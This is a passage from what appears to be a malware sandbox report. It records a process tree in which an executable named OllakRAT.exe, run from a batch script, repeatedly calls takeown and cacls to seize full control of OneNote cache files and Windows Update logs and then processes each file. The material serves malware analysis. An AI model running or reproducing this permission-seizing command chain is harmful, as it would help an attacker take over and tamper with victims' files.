  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:4216
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin""
  2⤵
  PID:6124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin" /E /G Admin:F /C
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin"
    3⤵
    PID:3896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007V.bin" -nobanner
    3⤵
    PID:1144
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007V.bin" -nobanner
      4⤵
      PID:4004
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin""
  2⤵
  PID:4224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin" /E /G Admin:F /C
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin"
    3⤵
    - Modifies file permissions
    PID:4576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000089.bin" -nobanner
    3⤵
    PID:5124
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000089.bin" -nobanner
      4⤵
      PID:1764
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin""
  2⤵
  PID:4432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin" /E /G Admin:F /C
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin"
    3⤵
    - Modifies file permissions
    PID:5372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000009B.bin" -nobanner
    3⤵
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000009B.bin" -nobanner
      4⤵
      PID:5536
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin""
  2⤵
  PID:5332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin" /E /G Admin:F /C
    3⤵
    PID:5400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin"
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000009L.bin" -nobanner
    3⤵
    PID:5812
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000009L.bin" -nobanner
      4⤵
      PID:4240
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin""
  2⤵
  PID:6076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin" /E /G Admin:F /C
    3⤵
    PID:5220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin"
    3⤵
    - Modifies file permissions
    PID:3348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "000000A6.bin" -nobanner
    3⤵
    PID:6012
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "000000A6.bin" -nobanner
      4⤵
      PID:3876
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin""
  2⤵
  PID:5428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin" /E /G Admin:F /C
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin"
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "000000AH.bin" -nobanner
    3⤵
    PID:5152
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "000000AH.bin" -nobanner
      4⤵
      PID:3784
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl""
  2⤵
  PID:5552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl" /E /G Admin:F /C
    3⤵
    PID:5700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl"
    3⤵
    - Modifies file permissions
    PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl" -nobanner
    3⤵
    PID:4372
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "MoUsoCoreWorker.2e7c001d-c36d-467a-993f-e8a7ae93a208.1.etl" -nobanner
      4⤵
      PID:4296
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl""
  2⤵
  PID:572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl" /E /G Admin:F /C
    3⤵
    PID:4180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl"
    3⤵
    - Modifies file permissions
    PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl" -nobanner
    3⤵
    PID:1352
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "WuProvider.02bb9d36-869d-4ff4-8e18-be9767b5c208.1.etl" -nobanner
      4⤵
      PID:3420
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin""
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin" /E /G Admin:F /C
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin"
    3⤵
    - Modifies file permissions
    PID:3872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "000000B7.bin" -nobanner
    3⤵
    PID:3972
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "000000B7.bin" -nobanner
      4⤵
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl""
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl" /E /G Admin:F /C
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl"
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl" -nobanner
    3⤵
    PID:3936
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "UpdateSessionOrchestration.f227201b-4092-454e-9f66-7709a83ee190.1.etl" -nobanner
      4⤵
      PID:5280
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin""
  2⤵
  PID:5884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin" /E /G Admin:F /C
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin"
    3⤵
    PID:5968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000006.bin" -nobanner
    3⤵
    PID:1828
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000006.bin" -nobanner
      4⤵
      PID:288
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin""
  2⤵
  PID:5956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin" /E /G Admin:F /C
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin"
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000J.bin" -nobanner
    3⤵
    PID:5504
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000J.bin" -nobanner
      4⤵
      PID:5772
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin""
  2⤵
  PID:3376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin" /E /G Admin:F /C
    3⤵
    PID:800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin"
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000U.bin" -nobanner
    3⤵
    PID:3968
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000U.bin" -nobanner
      4⤵
      PID:1228
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin""
  2⤵
  PID:6064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin" /E /G Admin:F /C
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin"
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000018.bin" -nobanner
    3⤵
    PID:872
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000018.bin" -nobanner
      4⤵
      PID:4748
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin""
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin" /E /G Admin:F /C
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin"
    3⤵
    - Modifies file permissions
    PID:2492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000052.bin" -nobanner
    3⤵
    PID:5816
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000052.bin" -nobanner
      4⤵
      PID:6000
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin""
  2⤵
  PID:2376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin" /E /G Admin:F /C
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin"
    3⤵
    PID:3988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000006U.bin" -nobanner
    3⤵
    PID:660
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000006U.bin" -nobanner
      4⤵
      PID:4060
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin""
  2⤵
  PID:5852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin" /E /G Admin:F /C
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin"
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000078.bin" -nobanner
    3⤵
    PID:3616
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin""
  2⤵
  PID:4252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin" /E /G Admin:F /C
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin"
    3⤵
    PID:6116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007I.bin" -nobanner
    3⤵
    PID:1324
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007I.bin" -nobanner
      4⤵
      PID:4788
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin""
  2⤵
  PID:5540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin" /E /G Admin:F /C
    3⤵
    PID:6040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin"
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000008H.bin" -nobanner
    3⤵
    PID:5844
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000008H.bin" -nobanner
      4⤵
      PID:5476
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin""
  2⤵
  PID:5696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin" /E /G Admin:F /C
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin"
    3⤵
    - Modifies file permissions
    PID:6068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000D.bin" -nobanner
    3⤵
    PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000D.bin" -nobanner
      4⤵
      PID:5800
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin""
  2⤵
  PID:4708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin" /E /G Admin:F /C
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin"
    3⤵
    - Modifies file permissions
    PID:4816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000P.bin" -nobanner
    3⤵
    PID:920
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000P.bin" -nobanner
      4⤵
      PID:4808
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin""
  2⤵
  PID:6036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin" /E /G Admin:F /C
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin"
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000013.bin" -nobanner
    3⤵
    PID:5020
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000013.bin" -nobanner
      4⤵
      PID:4712
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin""
  2⤵
  PID:5388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin" /E /G Admin:F /C
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin"
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000006F.bin" -nobanner
    3⤵
    PID:3880
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000006F.bin" -nobanner
      4⤵
      PID:2504
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin""
  2⤵
  PID:2268
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin" /E /G Admin:F /C
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin"
    3⤵
    - Modifies file permissions
    PID:5160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000006P.bin" -nobanner
    3⤵
    PID:6120
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000006P.bin" -nobanner
      4⤵
      PID:5604
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin""
  2⤵
  PID:5472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin" /E /G Admin:F /C
    3⤵
    PID:452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin"
    3⤵
    - Modifies file permissions
    PID:4312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000073.bin" -nobanner
    3⤵
    PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000073.bin" -nobanner
      4⤵
      PID:4216
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin""
  2⤵
  PID:5460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin" /E /G Admin:F /C
    3⤵
    PID:3896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin"
    3⤵
    - Modifies file permissions
    PID:5512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000081.bin" -nobanner
    3⤵
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000081.bin" -nobanner
      4⤵
      PID:5068
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4316
- C:\Windows\SysWOW64\cmd.exe
